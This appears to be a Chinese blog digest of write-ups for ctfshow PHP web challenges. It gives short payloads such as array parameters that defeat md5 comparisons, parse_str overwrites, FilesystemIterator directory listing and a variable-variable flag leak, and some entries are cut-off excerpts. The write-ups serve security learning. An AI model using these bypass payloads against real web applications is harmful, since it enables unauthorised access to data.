web126与web125差不多 12get: a=1+fl0g=flag_give_mepost: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1]) web127绕过方式和we...

web110
考察FilesystemIterator。getcwd()函数 获取当前工作目录 返回当前工作目录。
payload:
1
?v1=FilesystemIterator&v2=getcwd

缺陷是如果flag的文件不在第一位的话，就不能得到这个文件名。

1
2
3
4
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}

这一段说get传的值不能等于error。
1
2
3
4
foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}

这一段说POST传的值不能等于flag。
1
2
3
if(!($_POST['flag']==$flag)){
die($error);
}

这一段说POST传的值不等于flag的话输出变量error。
payload:
1
2
GET:?a=flag
POST:error=a

web101 12当新建ReflectionClass类并传入PHP代码时，会返回代码的运行结果，可以通过echo显示即使传入了空的括号，代码依旧可以运行，且error_reporting(0)的存在阻止了报错 v1必须是数字，v2可...

web97
要求POST传参，a不能等于b，但是a和b的md5值要相同，但是md5这个函数呢有个漏洞，传入的参数为数组的时候会发生错误，并返回NULL。
1
a[]=123&b[]=1234

web89
用数组绕过就行。
payload:
1
?num[]=a;

web87
谈一谈php://filter的妙用